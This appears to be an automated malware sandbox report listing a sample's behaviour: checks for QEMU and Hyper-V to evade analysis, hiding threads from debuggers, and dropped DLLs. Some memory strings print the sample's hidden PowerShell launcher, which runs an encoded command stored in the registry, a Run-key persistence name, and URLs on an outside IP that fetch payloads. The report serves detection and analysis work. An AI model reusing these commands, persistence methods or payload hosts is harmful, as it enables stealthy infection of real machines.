Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*=
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp	Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNDEATHWE2SOFTWARE\APPDATALOW\NYDELSESMIC:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -WINDOWSTYLE HIDDEN $DISCOMMO=(GET-ITEMPROPERTY -PATH 'HKCU:\SOFTWARE\APPDATALOW\').NYDELSESMI;POWERSHELL.EXE -WINDOWSTYLE HIDDEN -ENCODEDCOMMAND($DISCOMMO)HTTP://103.167.84.150/MCONTA/HOST_DWUBTLYDN243.BINHTTP://103.167.84.150/BCONTA/HOST_DWUBTLYDN243.BIN
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16377684340.0000000008BA0000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNDEATHWE2HTTP://103.167.84.150/MCONTA/HOST_DWUBTLYDN243.BINHTTP://103.167.84.150/BCONTA/HOST_DWUBTLYDN243.BIN
Source: powershell.exe, 0000000E.00000002.16330545492.0000000000B9F000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0OK

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3380	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4024	Thread sleep count: 9692 > 30	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4024	Thread sleep time: -48460s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424	Thread sleep count: 8939 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep count: 7304 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708	Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1372	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868	Thread sleep count: 7364 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4140	Thread sleep time: -5534023222112862s >= -30000s

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread sleep count: Count: 9692 delay: -5

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uotckr0j.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vybs2gqu.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mla4kvb3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_0842C6E0 rdtsc

3_2_0842C6E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7437	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Window / User API: threadDelayed 9692	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7646	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8939	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7304
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7364

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_07B96980 GetSystemInfo,

9_2_07B96980

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: ModuleInformation

Jump to behavior

Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 00000007.00000002.16980856005.0000000003187000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWX
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0OK
Source: ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 0000000D.00000003.15980734542.0000000008498000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16227173790.0000000008498000.00000004.00000001.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*=
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp	Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunDeathwe2SOFTWARE\AppDataLow\Nydelsesmic:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmp, ieinstal.exe, 00000007.00000002.16980856005.0000000003187000.00000004.00000020.sdmp, ieinstal.exe, 00000013.00000002.16197042104.0000000002EEE000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16337063429.00000000032F9000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16377684340.0000000008BA0000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunDeathwe2http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ieinstal.exe, 00000013.00000002.16196062237.0000000002EB9000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW j
Source: ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000003.00000002.15296346029.000000000B2D9000.00000004.00000001.sdmp, ieinstal.exe, 00000007.00000002.16982621026.0000000004C99000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16237703934.000000000AA69000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16379639423.000000000AB09000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16199207861.0000000004A89000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 0000000E.00000002.16330545492.0000000000B9F000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ieinstal.exe, 00000014.00000002.16339999223.0000000004DB9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_0842C6E0 rdtsc

3_2_0842C6E0

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D294AE mov eax, dword ptr fs:[00000030h]	19_2_02D294AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D247C8 mov eax, dword ptr fs:[00000030h]	19_2_02D247C8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2A368 mov eax, dword ptr fs:[00000030h]	19_2_02D2A368
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2473C mov eax, dword ptr fs:[00000030h]	19_2_02D2473C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300473C mov eax, dword ptr fs:[00000030h]	20_2_0300473C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300A368 mov eax, dword ptr fs:[00000030h]	20_2_0300A368
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_030047C8 mov eax, dword ptr fs:[00000030h]	20_2_030047C8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_030094AE mov eax, dword ptr fs:[00000030h]	20_2_030094AE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort
